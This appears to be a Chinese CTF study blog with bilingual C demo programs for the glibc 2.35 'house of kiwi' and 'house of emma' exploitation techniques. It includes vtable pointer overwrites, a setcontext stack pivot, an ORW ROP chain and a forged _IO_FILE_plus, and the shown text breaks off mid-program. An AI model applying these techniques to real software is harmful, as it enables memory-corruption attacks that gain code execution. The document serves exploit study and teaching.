    puts("\033[32m函数fflush中会跳转到另一个函数，这就是我们利用的机会。\033[0m");
    puts("\033[32mLet's have a look at function fflush:\033[0m");
    puts("\033[32m让我们看一下fflush的内容：\033[0m");
    puts("\033[33m(line 33, /assert/assert.c)\033[0m");
    puts("\033[34m#define fflush(s) _IO_fflush (s)\033[0m");
    puts("\033[33m(line 30, /libio/iofflush.c)\033[0m");
    puts("\033[34mint\n"
         "_IO_fflush (FILE *fp)\n"
         "{\n"
         "  if (fp == NULL)\n"
         "    return _IO_flush_all ();\n"
         "  else\n"
         "    {\n"
         "      int result;\n"
         "      CHECK_FILE (fp, EOF);\n"
         "      _IO_acquire_lock (fp);\n"
         "      \033[1;31mresult = _IO_SYNC (fp) ? EOF : 0;\033[34m\n"
         "      _IO_release_lock (fp);\n"
         "      return result;\n"
         "    }\n"
         "}\033[0m");

    puts("\033[32mPlease pay attention to the red code, here is its disassembly result:\033[0m");
    puts("\033[32m注意标红的代码，下面是这段代码的反汇编结果（pwndbg调试界面部分截取）\033[0m");
    puts("\033[34m   0x7ffff7e00208 <__GI__IO_fflush+88>:\t\033[1;31mlea    rdx,[rip+0x1967f1]        # 0x7ffff7f96a00 <_IO_helper_jumps>\033[34m\n"
         "   0x7ffff7e0020f <__GI__IO_fflush+95>:\tlea    rax,[rip+0x197552]        # 0x7ffff7f97768\n"
         "   0x7ffff7e00216 <__GI__IO_fflush+102>:\tsub    rax,rdx\n"
         "   0x7ffff7e00219 <__GI__IO_fflush+105>:\tmov    rcx,rbp\n"
         "   0x7ffff7e0021c <__GI__IO_fflush+108>:\tsub    rcx,rdx\n"
         "   0x7ffff7e0021f <__GI__IO_fflush+111>:\tcmp    rax,rcx\n"
         "   0x7ffff7e00222 <__GI__IO_fflush+114>:\tjbe    0x7ffff7e00268 <__GI__IO_fflush+184>\n"
         "   0x7ffff7e00224 <__GI__IO_fflush+116>:\tmov    rdi,rbx\n"
         "   0x7ffff7e00227 <__GI__IO_fflush+119>:\t\033[1;31mcall   QWORD PTR [rbp+0x60]\033[34m\n"
         "   0x7ffff7e0022a <__GI__IO_fflush+122>:\tneg    eax\n"
         "   0x7ffff7e0022c <__GI__IO_fflush+124>:\tsbb    r12d,r12d\n"
         "   0x7ffff7e0022f <__GI__IO_fflush+127>:\ttest   DWORD PTR [rbx],0x8000\n"
         "   0x7ffff7e00235 <__GI__IO_fflush+133>:\tjne    0x7ffff7e00258 <__GI__IO_fflush+168>\n"
         "   0x7ffff7e00237 <__GI__IO_fflush+135>:\tmov    rdi,QWORD PTR [rbx+0x88]\n"
         "   0x7ffff7e0023e <__GI__IO_fflush+142>:\tmov    eax,DWORD PTR [rdi+0x4]\n"
         "   0x7ffff7e00241 <__GI__IO_fflush+145>:\tsub    eax,0x1\n"
         "   0x7ffff7e00244 <__GI__IO_fflush+148>:\tmov    DWORD PTR [rdi+0x4],eax\n"
         "   0x7ffff7e00247 <__GI__IO_fflush+151>:\tjne    0x7ffff7e00258 <__GI__IO_fflush+168>\n"
         "   0x7ffff7e00249 <__GI__IO_fflush+153>:\tmov    QWORD PTR [rdi+0x8],0x0\n\033[0m");

    puts("\033[32mAs you can see, it calls [rbp+0x60], let's execute the code until there...\033[0m");
    puts("\033[32m可以看到这里call了[rbp+0x60]，我们调试到这里看一下rbp的值...\033[0m");
    puts("\033[1;33m R14  0x1000\n"
         " R15  0xff\n"
         "*RBP  0x7ffff7f97600 (_IO_file_jumps) ◂— 0x0\n"
         "*RSP  0x7fffffffdc60 —▸ 0x7ffff7f9ac80 (main_arena) ◂— 0x0\n"
         "*RIP  0x7ffff7e00227 (fflush+119) ◂— call   qword ptr [rbp + 0x60]\n\033[0m");
    puts("\033[32mThe rbp points to a struct called _IO_file_jumps, let's see what it looks like in IDA:\033[0m");
    puts("\033[32mrbp指向了一个名为_IO_file_jumps的结构，看一下它在IDA中的内容：\033[0m");
    puts("\033[34m__libc_IO_vtables:0000000000216600 _IO_file_jumps  dq 0                    ; DATA XREF: LOAD:0000000000014598↑o\n"
         "__libc_IO_vtables:0000000000216600                                         ; sub_29CA0+B↑o ...\n"
         "__libc_IO_vtables:0000000000216608                 dq 0\n"
         "__libc_IO_vtables:0000000000216610                 dq offset _IO_file_finish\n"
         "__libc_IO_vtables:0000000000216618                 dq offset _IO_file_overflow\n"
         "__libc_IO_vtables:0000000000216620                 dq offset _IO_file_underflow\n"
         "__libc_IO_vtables:0000000000216628                 dq offset _IO_default_uflow\n"
         "__libc_IO_vtables:0000000000216630                 dq offset _IO_default_pbackfail\n"
         "__libc_IO_vtables:0000000000216638                 dq offset _IO_file_xsputn\n"
         "__libc_IO_vtables:0000000000216640                 dq offset sub_8B330\n"
         "__libc_IO_vtables:0000000000216648                 dq offset _IO_file_seekoff\n"
         "__libc_IO_vtables:0000000000216650                 dq offset sub_8E530\n"
         "__libc_IO_vtables:0000000000216658                 dq offset _IO_file_setbuf\n"
         "\033[1;31m__libc_IO_vtables:0000000000216660                 dq offset _IO_file_sync\033[34m\n"
         "__libc_IO_vtables:0000000000216668                 dq offset _IO_file_doallocate\n"
         "__libc_IO_vtables:0000000000216670                 dq offset _IO_file_read\n"
         "__libc_IO_vtables:0000000000216678                 dq offset _IO_file_write\n"
         "__libc_IO_vtables:0000000000216680                 dq offset _IO_file_seek\n"
         "__libc_IO_vtables:0000000000216688                 dq offset _IO_file_close\n"
         "__libc_IO_vtables:0000000000216690                 dq offset _IO_file_stat\n"
         "__libc_IO_vtables:0000000000216698                 dq offset sub_8F4A0\n"
         "__libc_IO_vtables:00000000002166A0                 dq offset sub_8F4B0\n"
         "__libc_IO_vtables:00000000002166A8                 align 20h\033[0m");

    puts("\033[32mSo it actually calls the function _IO_file_sync.\033[0m");
    puts("\033[32m因此这里实际上是在调用_IO_file_sync函数。\033[0m");
    puts("\033[32mHouse of kiwi just changed the value there to anywhere we want.\033[0m");
    puts("\033[32mhouse of kiwi实际上就是将这里的值进行修改。\033[0m");
    puts("\033[32mIn CTF problems, we usually changed it into setcontext+61 to trigger stack pivoting.\033[0m");
    puts("\033[32m在CTF赛题中，我们一般将这里的值修改为setcontext+61来触发栈迁移。\033[0m");
    puts("\033[32mBut there is one thing to notice, if you use command 'vmmap' in pwndbg,\033[0m");
    puts("\033[32m但这里有一点需要注意，如果在pwndbg中使用vmmap命令，\033[0m");
    puts("\033[32mYou will find that the page where _IO_file_jumps is located in was not able to write.\033[0m");
    puts("\033[32m你会发现_IO_file_jumps所在的页并不具有写权限（这一点笔者在其他有关house of kiwi的文章中并没有找到原因，不知为何）\033[0m");
    puts("\033[32mSo we had better change the privilege of that page through function mprotect().\033[0m");
    puts("\033[32m因此我们最好使用mprotect函数来修改一下这一页的访问权限。\033[0m\n");
    puts("\033[32mThen, let's have a look at rdx, which is a key register for stack pivoting.\033[0m");
    puts("\033[32m然后我们注意一下rdx寄存器的值，这是我们进行栈迁移的关键寄存器。\033[0m");
    puts("\033[32mHave a look at disassembly result of function setcontext: \033[0m");
    puts("\033[32m看一下setcontext函数的汇编: \033[0m");
    puts("\033[34m.text:0000000000053A6D                 \033[1;31mmov     rsp, [rdx+0A0h]\033[34m\n"
         ".text:0000000000053A74                 mov     rbx, [rdx+80h]\n"
         ".text:0000000000053A7B                 mov     rbp, [rdx+78h]\n"
         ".text:0000000000053A7F                 mov     r12, [rdx+48h]\n"
         ".text:0000000000053A83                 mov     r13, [rdx+50h]\n"
         ".text:0000000000053A87                 mov     r14, [rdx+58h]\n"
         ".text:0000000000053A8B                 mov     r15, [rdx+60h]\n"
         ".text:0000000000053A8F                 test    dword ptr fs:48h, 2\n"
         ".text:0000000000053A9B                 jz      loc_53B56\n"
         "\t\t\t......\n"
         ".text:0000000000053B56                 \033[1;31mmov     rcx, [rdx+0A8h]\033[34m\n"
         ".text:0000000000053B5D                 \033[1;31mpush    rcx\033[34m\n"
         ".text:0000000000053B5E                 mov     rsi, [rdx+70h]\n"
         ".text:0000000000053B62                 mov     rdi, [rdx+68h]\n"
         ".text:0000000000053B66                 mov     rcx, [rdx+98h]\n"
         ".text:0000000000053B6D                 mov     r8, [rdx+28h]\n"
         ".text:0000000000053B71                 mov     r9, [rdx+30h]\n"
         ".text:0000000000053B75                 mov     rdx, [rdx+88h]\n"
         ".text:0000000000053B75 ; } // starts at 53A30\n"
         ".text:0000000000053B7C ; __unwind {\n"
         ".text:0000000000053B7C                 xor     eax, eax\n"
         ".text:0000000000053B7E                 retn\033[0m");
    puts("\033[32mYou can see the rsp was changed into [rdx+0xA0]\033[0m");
    puts("\033[32m你可以看到rsp被修改为[rdx+0xA0]的值。\033[0m");
    puts("\033[32mWhen calling _IO_file_sync, the value of rdx is actually the address of _IO_helper_jumps.\033[0m");
    puts("\033[32m在call _IO_file_sync时，rdx的值实际上是_IO_helper_jumps的地址。\033[0m");
    puts("\033[32mThis value is stable and it's right above _IO_file_jumps:\033[0m");
    puts("\033[32m这个值是稳定不变的，实际上这个结构体的地址就在_IO_file_jumps前面一点:\033[0m");
    puts("\033[34m__libc_IO_vtables:0000000000215A00 qword_215A00    dq 0                    ; DATA XREF: sub_45390+1A3↑o\n"
         "__libc_IO_vtables:0000000000215A00                                         ; sub_5A980+1643↑o ...\n"
         "__libc_IO_vtables:0000000000215A08                 dq 0\n"
         "__libc_IO_vtables:0000000000215A10                 dq offset _IO_default_finish\n"
         "__libc_IO_vtables:0000000000215A18                 dq offset sub_722E0\n"
         "__libc_IO_vtables:0000000000215A20                 dq offset sub_8DDD0\n"
         "__libc_IO_vtables:0000000000215A28                 dq offset _IO_default_uflow\n"
         "......\033[0m\n");

    puts("\033[32mSo that we need to change the value of [rdx+0xA0] and [rdx+0xA8] to complete ROP chain.\033[0m");
    puts("\033[32m因此我们需要修改[rdx+0xA0]和[rdx+0xA8]的值来构建ROP链。\n\033[0m");

    puts("\033[32mNow we are going to have a try.\033[0m");
    puts("\033[32m现在就让我们来演示一下。\033[0m");
    puts("\033[32mFirst we get the libc base through function setvbuf, which has the offset of 0x81670 in this libc.\033[0m");
    puts("\033[32m首先我们通过setvbuf函数获取libc加载基址，setvbuf函数在本libc中的偏移为0x81670。\033[0m");

    libc_base  = ((size_t)setvbuf) - 0x81670;
    printf("\033[1;31mLIBC: %#lx\n\033[0m", libc_base);

    printf("\033[32mThen we use mprotect function to add write privilege in address %p to %p.\n\033[0m",
           (void*)(libc_base + 0x215000), (void*)(libc_base + 0x217000));
    printf("\033[32m然后我们将 %p 到 %p 的地址空间添加写权限。\n\033[0m",
           (void*)(libc_base + 0x215000), (void*)(libc_base + 0x217000));
    mprotect((void*)(libc_base + 0x215000), 0x2000, PROT_READ | PROT_WRITE);

    size_t magic_gadget = libc_base + 0x53A30 + 61; // setcontext + 61
    printf("\033[1;32mThen we get address of setcontext+61, which has offset of 0x53A30 + 61: %#zx\n\033[0m", magic_gadget);
    printf("\033[1;32m然后我们获取到setcontext+61的地址，其相对于libc基址的偏移为0x53A30 + 61: %#zx\n\033[0m", magic_gadget);
    size_t _IO_helper_jumps = libc_base + 0x215A00; // _IO_helper_jumps
    printf("\033[1;32mNext is the address of _IO_helper_jumps, which has offset of 0x215A00: %#zx\n\033[0m", _IO_helper_jumps);
    printf("\033[1;32m接下来是_IO_helper_jumps的地址，其相对于libc基址的偏移为0x215A00: %#zx\n\033[0m", _IO_helper_jumps);
    size_t _IO_file_sync = libc_base + 0x216660; // sync pointer in _IO_file_jumps
    printf("\033[1;32mNext is the address of _IO_file_sync, which has offset of 0x216660: %#zx\n\033[0m", _IO_file_sync);
    printf("\033[1;32m接下来是_IO_file_sync的地址，其相对于libc基址的偏移为0x216660: %#zx\n\033[0m", _IO_file_sync);

    puts("\033[32mThen let's construct our ROP chain of orw. The ROP chain will be placed in bss segment.\033[0m");
    puts("\033[32m然后我们就来构造ROP链，用于orw。ROP链会放在bss段中。\033[0m");
    puts("\033[32mUseful gadgets:\033[0m");
    puts("\033[32m有用的gadget：（不同libc下的偏移可能不同，如果在不同libc下测试注意修改）\033[0m");
    printf("\033[1;31mpop rax ; ret: %#zx\n\033[0m", pop_rax_ret);
    printf("\033[1;31mpop rdi ; ret: %#zx\n\033[0m", pop_rdi_ret);
    printf("\033[1;31mpop rsi ; ret: %#zx\n\033[0m", pop_rsi_ret);
    printf("\033[1;31msyscall ; ret: %#zx\n\033[0m", syscall_ret);
    printf("\033[1;31mpop rdx ; pop r12 ; ret: %#zx\n\n\033[0m", pop_rdx_r12);

    uint32_t i = 0;
    ROP[i++] = pop_rax_ret;
    ROP[i++] = 2;
    ROP[i++] = pop_rdi_ret;
    ROP[i++] = (size_t)FLAG;
    ROP[i++] = pop_rsi_ret;
    ROP[i++] = 0;
    ROP[i++] = syscall_ret;
    ROP[i++] = pop_rdi_ret;
    ROP[i++] = 3;
    ROP[i++] = pop_rdx_r12;
    ROP[i++] = 0x100;
    ROP[i++] = 0;
    ROP[i++] = pop_rsi_ret;
    ROP[i++] = (size_t)(FLAG + 0x10);
    ROP[i++] = (size_t)read;
    ROP[i++] = pop_rdi_ret;
    ROP[i++] = 1;
    ROP[i++] = (size_t)write;

    puts("\033[32mROP chain constructed, then we need to change the value of [rdx+0xA0] and [rdx+0xA8].\033[0m");
    puts("\033[32mROP链构造完成，下面我们需要修改[rdx+0xA0]和[rdx+0xA8]的值了。\033[0m");
    puts("\033[32mWe need to let [_IO_helper_jumps+0xA0] = ROP chain address, and [_IO_helper_jumps+0xA8] = address of instruction \"ret\"\033[0m");
    puts("\033[32m我们需要让[_IO_helper_jumps+0xA0]等于ROP链的地址，[_IO_helper_jumps+0xA8]等于一条ret指令的地址。\"ret\"\033[0m");
    puts("\033[32mThis is basic knowledge you need to know when using setcontext to pivot your stack.\033[0m");
    puts("\033[32m这是使用setcontext进行栈迁移的基本操作。\033[0m");
    *((size_t*)_IO_helper_jumps + 0xA0/8) = (size_t)ROP; // 设置rsp
    *((size_t*)_IO_helper_jumps + 0xA8/8) = ret; // 设置rcx 即 程序setcontext运行完后会首先调用的指令地址
    puts("\033[32mThen we let _IO_file_sync pointer = setcontext + 61.\033[0m");
    puts("\033[32m然后我们让_IO_file_sync指针的值等于setcontext+61，以触发栈迁移。\033[0m");
    *((size_t*)_IO_file_sync) = magic_gadget; // 设置fflush(stderr)中调用的指令地址
    // 触发assert断言,通过large bin chunk的size中flag位修改,或者top chunk的inuse写0等方法可以触发assert
    puts("\033[32mNext we need to change the size of top chunk to let the assert fail.\033[0m");
    puts("\033[32m然后我们修改top chunk的大小让断言失败。\033[0m");
    size_t *top_size = (size_t*)((char*)malloc(0x10) + 0x18);
    *top_size = (*top_size)&0xFFE; // top_chunk size改小并将inuse写0,当top chunk不足的时候,会进入sysmalloc中,其中有个判断top_chunk的size中inuse位是否存在
    puts("\033[32mThe last step: malloc a big space.\033[0m");
    puts("\033[32m最后一步：malloc一块大空间。\033[0m");
    malloc(0x1000); // 触发assert
    _exit(-1);
}

glibc 2.35 pwn——house of emma示例程序

发表于 2023-02-28 更新于 2023-03-01 分类于学习笔记， glibc 系列
本文字数： 33k 阅读时长 ≈ 30 分钟

这是笔者写的house of emma示例程序，需要在ubuntu 22.04上编译运行，可以选择orw模式和getshell模式两种利用方式，每一步都有详细的解释，所有说明文字均使用不同颜色注明与高亮。请读者自取学习。如果需要进行调试，可以在需要调试的代码段插入sleep函数，然后就可以断在那里了。

若程序在运行过程中出现任何非预期情况，请及时与笔者联系，以便及时进行修改。

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

#define GETSHELL_MODE 1
#define ORW_MODE 2

// IMPORTANT! YOU CAN CHANGE THE MODE HERE
int mode = ORW_MODE;
char* sh = "/bin/sh";
char* flag = "./flag";
size_t space[0x100];

int main() {
    setvbuf(stdin,0LL,2,0LL);
    setvbuf(stdout,0LL,2,0LL);
    puts("\033[32mHello! today let's learn something about house of emma.\033[0m");
    puts("\033[32m本程序用于演示house of emma的漏洞利用原理。\033[0m");
    puts("\033[1;31mTested in Ubuntu 22.04, glibc version: Ubuntu GLIBC 2.35-0ubuntu3.1\033[0m");
    puts("\033[1;31m测试环境：Ubuntu 22.04，glibc版本为2.35-0ubuntu3.1\033[0m");
    puts("\033[32mHouse of emma is used for high version of glibc, it utilizes _IO_FILE struct to exploit.\033[0m");
    puts("\033[32mhouse of emma 适用于高版本glibc，它使用_IO_FILE结构体进行漏洞利用。\033[0m");
    puts("\033[32mSame as other way of exploitation with _IO_FILE, it also use fake _IO_FILE struct.\033[0m");
    puts("\033[32m与其他利用_IO_FILE结构体漏洞的方法相同，它也利用了伪造的_IO_FILE结构体。\n\033[0m");
    puts("\033[32mIt can be triggered by function __malloc_assert, so it always go with heap vulnerabilities.\033[0m");
    puts("\033[32m它可以通过函数__malloc_assert触发，因此它常常与堆漏洞相联系。\033[0m");
    puts("\033[32mFirst we need to know the structure of _IO_FILE in glibc 2.35:\033[0m"
         "\033[32m首先我们需要了解一下glibc 2.35版本下_IO_FILE结构体的内容：\n\033[0m"
         "\033[33m(line 49, /libio/bits/types/struct_FILE.h)\033[0m");
    puts("\033[34mstruct _IO_FILE\n"
         "{\n"
         "  int _flags;\t\t/* High-order word is _IO_MAGIC; rest is flags. */\n"
         "\n"
         "  /* The following pointers correspond to the C++ streambuf protocol. */\n"
         "  char *_IO_read_ptr;\t/* Current read pointer */\n"
         "  char *_IO_read_end;\t/* End of get area. */\n"
         "  char *_IO_read_base;\t/* Start of putback+get area. */\n"
         "  char *_IO_write_base;\t/* Start of put area. */\n"
         "  char *_IO_write_ptr;\t/* Current put pointer. */\n"
         "  char *_IO_write_end;\t/* End of put area. */\n"
         "  char *_IO_buf_base;\t/* Start of reserve area. */\n"
         "  char *_IO_buf_end;\t/* End of reserve area. */\n"
         "\n"
         "  /* The following fields are used to support backing up and undo. */\n"
         "  char *_IO_save_base; /* Pointer to start of non-current get area. */\n"
         "  char *_IO_backup_base;  /* Pointer to first valid character of backup area */\n"
         "  char *_IO_save_end; /* Pointer to end of non-current get area. */\n"
         "\n"
         "  struct _IO_marker *_markers;\n"
         "\n"
         "  struct _IO_FILE *_chain;\n"
         "\n"
         "  int _fileno;\n"
         "  int _flags2;\n"
         "  __off_t _old_offset; /* This used to be _offset but it's too small.  */\n"
         "\n"
         "  /* 1+column number of pbase(); 0 is unknown. */\n"
         "  unsigned short _cur_column;\n"
         "  signed char _vtable_offset;\n"
         "  char _shortbuf[1];\n"
         "\n"
         "  _IO_lock_t *_lock;\n"
         "#ifdef _IO_USE_OLD_IO_FILE\n"
         "};\n\033[0m");

    puts("\033[32mThe key element we need to forge is the *vtable pointer.\033[0m");
    puts("\033[32m其中的关键就是*vtable指针。\033[0m");
    puts("\033[32mIt's worth noticing that we need to write correct *_lock value in our fake _IO_FILE.\033[0m");
    puts("\033[32m值得注意的是，我们需要写入正确的*_lock指针值到伪造的_IO_FILE结构体中。\033[0m");
    puts("\033[32mThe value of *_lock should be \033[31m_IO_stdfile_1_lock.\033[0m");
    puts("\033[32m*_lock的值应该是\033[31m_IO_stdfile_1_lock.\033[0m");
    puts("\033[32mSo that we need to know the loading base address of libc.\033[0m");
    puts("\033[32m所以我们需要知道libc的加载基地址。\n\033[0m");

    puts("\033[35mNow let's get loading base address of libc through the address of function puts().\033[0m");
    puts("\033[35m现在让我们通过puts()函数获取一下libc的加载基地址。\033[0m");

    int(*func)(const char*)  = puts;
    printf("\033[32mThe address of function puts() is: \033[31m%p\n\033[0m", func);
    printf("\033[32mputs函数的地址为: \033[31m%p\n\033[0m", func);
    printf("\033[32mSo that the loading address of libc is: \033[31m%p\n\033[0m", func - 0x80ed0);
    printf("\033[32m因此libc的加载地址为: \033[31m%p\n\033[0m", func - 0x80ed0);
    puts("\033[33m(The offset address of function puts() is 0x80ed0)\033[0m");
    puts("\033[33m(puts函数的偏移量为0x80ed0)\n\033[0m");

    size_t libc_base = (size_t)(func - 0x80ed0);
    size_t stderr_ptr = (size_t)(libc_base + 0x21a860);

    printf("\033[32mSince we know the libc base address, we can also know the address of pointer stderr: \033[31m%p\033[0m\n", (void*)stderr_ptr);
    printf("\033[32m既然现在我们已经知道了libc的加载地址，我们也可以获得stderr指针的地址: \033[31m%p\033[0m\n", (void*)stderr_ptr);

    puts("\033[32mNow let's satisfy the second prerequisite of the exploit: \033[0m");
    puts("\033[32m下面让我们构造一下这个漏洞利用的第二个前提条件: \033[0m");
    puts("\033[33mGet the value of pointer_guard or change it to a known value.\033[0m");
    puts("\033[33m获取到pointer_guard的值并将其修改为一个已知值。\033[0m");
    puts("\033[32mOur house of emma has a stable call chain, and we'll need the value to guide rip to the function we want.\033[0m");
    puts("\033[32m我们的house of emma利用方式有一条完整的函数调用链，我们需要这个pointer_guard的值来引导rip到我们想要的函数。\033[0m");
    puts("\033[32mWhere the value is used will be introduced later.\033[0m");
    puts("\033[32m我们之后将会介绍这个pointer_guard的地址在什么地方。\033[0m");
    puts("\033[32mIt's worth noticing that\033[31m the value of pointer guard is not located in libc, while before libc.\033[0m");
    puts("\033[32m需要注意的是pointer guard的值并不在libc中，而是在libc的低地址处。\033[0m");
    puts("\033[32mIf you use pwndbg, you can see that before libc, there exists an anonymous space, with its size of 0x3000.\033[0m");
    puts("\033[32m如果使用pwndbg，你可以看到在libc前面有一个匿名的内存区域，大小为0x3000。\033[0m");
    puts("\033[32mThe tls struct is located in this anonymous area, which includes the value of pointer_guard.\033[0m");
    puts("\033[32mtls结构体就位于这个匿名的内存空间中，它包含有pointer_guard。\033[0m");
    puts("\033[32mTo be more detail, the value of pointer_guard is located in (libc_base - 0x3000 + 0x770)\033[0m");
    puts("\033[32m更具体地说，pointer_guard的值应该位于(libc_base - 0x3000 + 0x770)\n\033[0m");

    puts("\033[32mActually, the name of the struct is \033[31mtcbhead_t\033[32m. Here is the structure:\033[0m");
    puts("\033[32m实际上，这个结构体的名字是\033[31mtcbhead_t\033[32m. 下面是它的构造:\033[0m");
    puts("\033[33m(line 36, /sysdeps/x86_64/nptl/tls.h)\033[0m");
    puts("\033[34mtypedef struct\n"
         "{\n"
         "  void *tcb;\t\t/* Pointer to the TCB.  Not necessarily the\n"
         "\t\t\t   thread descriptor used by libpthread.  */\n"
         "  dtv_t *dtv;\n"
         "  void *self;\t\t/* Pointer to the thread descriptor.  */\n"
         "  int multiple_threads;\n"
         "  int gscope_flag;\n"
         "  uintptr_t sysinfo;\n"
         "  uintptr_t stack_guard;\n"
         "  uintptr_t pointer_guard;\n"
         "  unsigned long int unused_vgetcpu_cache[2];\n"
         "  /* Bit 0: X86_FEATURE_1_IBT.\n"
         "     Bit 1: X86_FEATURE_1_SHSTK.\n"
         "   */\n"
         "  unsigned int feature_1;\n"
         "  int __glibc_unused1;\n"
         "  /* Reservation of some values for the TM ABI.  */\n"
         "  void *__private_tm[4];\n"
         "  /* GCC split stack support.  */\n"
         "  void *__private_ss;\n"
         "  /* The lowest address of shadow stack,  */\n"
         "  unsigned long long int ssp_base;\n"
         "  /* Must be kept even if it is no longer used by glibc since programs,\n"
         "     like AddressSanitizer, depend on the size of tcbhead_t.  */\n"
         "  __128bits __glibc_unused2[8][4] __attribute__ ((aligned (32)));\n"
         "\n"
         "  void *__padding[8];\n"
         "} tcbhead_t;\033[0m");
    puts("\033[32mWe can see that the stack guard is right above the pointer guard, so we can't absolutely change the stack_guard.\033[0m");
    puts("\033[32m我们可以发现stack_guard就在pointer_guard的上面，因此我们绝对不能修改stack_guard的值。\033[0m");
    printf("\033[32mLet's calculate the address of pointer_guard: \033[31m%p\033[0m\n", (size_t*)(libc_base - 0x3000 + 0x770));
    printf("\033[32m让我们计算一下pointer_guard的地址: \033[31m%p\033[0m\n", (size_t*)(libc_base - 0x3000 + 0x770));

    size_t* pointer_guard_address = (size_t*)(libc_base - 0x3000 + 0x770);
    printf("\033[32mThe value of pointer_guard is: \033[31m%#zx\033[0m\n", *pointer_guard_address);
    printf("\033[32mpointer_guard的值为: \033[31m%#zx\033[0m\n", *pointer_guard_address);
    puts("\033[32mIn CTF problems you can't always get the original value of pointer_guard, but you can also change it to a known value.\033[0m");
    puts("\033[32m在CTF赛题中你可能不能获取到pointer_guard的值，但你可以将其改写为一个已知值。\n\033[0m");

    puts("\033[32mOK, now we can try to forge a _IO_FILE struct.\033[0m");
    puts("\033[32m那么现在我们就来开始伪造_IO_FILE结构体。\033[0m");
    puts("\033[32mAttention: what we forge is actually _IO_FILE_plus struct, which contains a _IO_FILE struct and a vtable pointer(_IO_jump_t*)\033[0m");
    puts("\033[32m注意：我们伪造的实际上是_IO_FILE_plus结构体，其包含_IO_FILE结构体的所有内容以及一个vtable指针(_IO_jump_t*)\033[0m");

    struct _IO_FILE* fake_file_struct = (struct _IO_FILE*)malloc(0x100);
    size_t* vtable = (size_t*)((char*)fake_file_struct + sizeof (struct _IO_FILE));

    printf("\033[32mWe just allocate a fake _IO_FILE_plus struct into the heap: \033[31m%p\033[m\n", fake_file_struct);
    printf("\033[32m我们刚刚分配了一个假的_IO_FILE_plus结构体到堆: \033[31m%p\033[m\n", fake_file_struct);
    printf("\033[32mThe address of fake _IO_FILE_plus is: \033[31m%p\033[0m\n", fake_file_struct);
    printf("\033[32m这个假的_IO_FILE_plus结构体的地址为: \033[31m%p\033[0m\n", fake_file_struct);
    printf("\033[32mThe address of vtable pointer is: \033[31m%p\033[0m\n", vtable);
    printf("\033[32mvtable指针的地址为: \033[31m%p\033[0m\n", vtable);
    puts("\033[32mThen we are going to change the value of _lock and vtable pointer.\033[0m");
    puts("\033[32m然后我们来修改_lock和vtable指针的值。\033[0m");
    puts("\033[32mThe _lock should be changed into \033[31m_IO_stdfile_1_lock\033[32m, which is in \033[31m(libc_base + 0x21ba70).\033[0m");
    puts("\033[32m_lock的值应该被修改为\033[31m_IO_stdfile_1_lock\033[32m, 它的地址为\033[31m(libc_base + 0x21ba70).\033[0m");
    puts("\033[32mThe vtable should be changed into \033[31m(_IO_cookie_jumps + 0x38)\033[32m, "
         "which points to function \033[31m_IO_file_xsputn.\033[0m");
    puts("\033[32mvtable指针应该被修改为\033[31m(_IO_cookie_jumps + 0x38)\033[32m, "
         "其指向函数\033[31m_IO_file_xsputn.\033[0m\n");

    printf("\033[32mBefore alteration: fake_file_struct->_lock = \033[33m%p\033[0m\n", fake_file_struct->_lock);
    printf("\033[32m修改前: fake_file_struct->_lock = \033[33m%p\033[0m\n", fake_file_struct->_lock);
    fake_file_struct->_lock = (void *) (libc_base + 0x21ba70);
    printf("\033[32mAfter alteration: fake_file_struct->_lock = \033[31m%p\033[0m\n", fake_file_struct->_lock);
    printf("\033[32m修改后: fake_file_struct->_lock = \033[31m%p\033[0m\n\n", fake_file_struct->_lock);

    printf("\033[32mBefore alteration: fake_file_struct->vtable = \033[33m%#zx\033[0m\n", *vtable);
    printf("\033[32m修改前: fake_file_struct->vtable = \033[33m%#zx\033[0m\n", *vtable);
    *vtable = (size_t)(libc_base + 0x215b80 + 0x38);
    printf("\033[32mAfter alteration: fake_file_struct->vtable = \033[31m%#zx\033[0m\n", *vtable);
    printf("\033[32m修改后: fake_file_struct->vtable = \033[31m%#zx\033[0m\n\n", *vtable);

    size_t* top_chunk_size = (size_t*)((char*)fake_file_struct + 0x108);
    printf("\033[32mThrough pwndbg, we can see that the size of top chunk is at fake_file_struct + 0x108 = %p\033[0m\n", top_chunk_size);
    printf("\033[32m通过pwndbg我们可以看到top chunk的大小保存在fake_file_struct + 0x108 = %p\033[0m\n", top_chunk_size);
    printf("\033[32mThe value of top_chunk->size is: %#zx\033[0m\n", *top_chunk_size);
    printf("\033[32mtop chunk的大小top_chunk->size为: %#zx\033[0m\n", *top_chunk_size);
    puts("\033[32mIn function sysmalloc, there is a check for page alignment of top chunk: \n\033[0m");
    puts("\033[32m在函数sysmalloc中，有一个检查top chunk页对齐的代码片段: \033[0m");
    puts("\033[33m(line 2617, /malloc/malloc.c)\033[0m");
    puts("\033[34m  assert ((old_top == initial_top (av) && old_size == 0) ||\n"
         "          ((unsigned long) (old_size) >= MINSIZE &&\n"
         "           prev_inuse (old_top) &&\n"
         "           ((unsigned long) old_end & (pagesize - 1)) == 0));\n\033[0m");
    puts("\033[32mThe function assert here in malloc.c is a bit different from that in other file.\033[0m");
    puts("\033[32m这个malloc.c中的assert函数与其他文件中的函数不太一样。\033[0m");
    puts("\033[32mBecause in malloc.c there is a #define statement: \033[0m");
    puts("\033[32m因为在malloc.c中有一个#define语句: \n\033[0m");
    puts("\033[33m(line 292, /malloc/malloc.c)\033[0m");
    puts("\033[34m# define __assert_fail(assertion, file, line, function)\t\t\t\\\n"
         "\t __malloc_assert(assertion, file, line, function)\n\033[0m");
    puts("\033[32mSo that if the assertion in malloc.c failed, it will call function __malloc_assert.\033[0m");
    puts("\033[32m所以如果这个检查失败了，那么它就会调用__malloc_assert.\033[0m");

    puts("\033[32mThe content of function __malloc_assert is: \033[0m");
    puts("\033[32m__malloc_assert函数的内容为: \033[0m");
    puts("\033[33m(line 297, /malloc/malloc.c)\033[0m");
    puts("\033[34mstatic void\n"
         "__malloc_assert (const char *assertion, const char *file, unsigned int line,\n"
         "\t\t const char *function)\n"
         "{\n"
         "  (void) __fxprintf (NULL, \"%s%s%s:%u: %s%sAssertion `%s' failed.\\n\",\n"
         "\t\t     __progname, __progname[0] ? \": \" : \"\",\n"
         "\t\t     file, line,\n"
         "\t\t     function ? function : \"\", function ? \": \" : \"\",\n"
         "\t\t     assertion);\n"
         "  fflush (stderr);\n"
         "  abort ();\n"
         "}\033[0m\n");

    puts("\033[32mWhile in function __fxprintf, it will utilize stderr to output something, and that is our chance.\033[0m");
    puts("\033[32m函数__fxprintf会利用stderr来输出错误信息，这就是我们利用的机会。\033[0m");
